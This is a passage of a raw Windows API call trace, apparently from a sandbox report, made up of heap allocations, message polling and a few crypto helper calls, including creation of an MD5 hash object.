RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0228.852] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0228.852] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0228.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0228.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0228.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0228.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0228.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0228.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0228.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0228.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0228.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0228.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0228.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0228.854] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.854] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.854] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0228.854] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0228.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0228.855] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0228.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0228.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0228.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0228.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0228.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0228.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0228.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0228.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0228.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0228.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0228.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.892] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0228.893] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0228.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.893] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0228.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0228.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.893] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.893] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0228.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0228.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0228.893] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.893] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.894] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0228.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0228.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0228.894] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.894] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.894] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0228.894] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0228.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0228.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0228.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0228.895] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0228.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0228.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0228.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0228.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: 